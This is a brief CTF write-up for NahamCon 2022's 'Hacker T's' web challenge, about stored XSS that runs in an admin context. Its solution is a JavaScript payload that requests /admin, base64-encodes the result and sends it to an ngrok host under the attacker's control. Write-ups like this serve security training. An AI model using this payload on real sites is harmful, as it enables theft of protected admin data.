Skip to content

NahamCon CTF 2022: Hacker T's

TL;DR

  • User-controlled input is rendered without proper sanitization.
  • Stored XSS executes in an admin context.
  • Malicious JavaScript requests the protected /admin endpoint.
  • Flag is base64-encoded and exfiltrated to an attacker-controlled server.

Video Walkthrough

NahamCon CTF 2022 Hacker T's web video walkthrough demonstrating stored XSS and admin endpoint flag exfiltration

Description

We all love our hacker t-shirts. Make your own custom ones.

Solution

var xhr = new XMLHttpRequest();
xhr.open("GET", "http://localhost:5000/admin");
xhr.onload = function () {
    var flag = btoa(xhr.responseText);
    var exfil = new XMLHttpRequest();
    exfil.open("GET", "http://9106-81-103-153-174.ngrok.io?flag=" + flag);
    exfil.send();
};
xhr.send();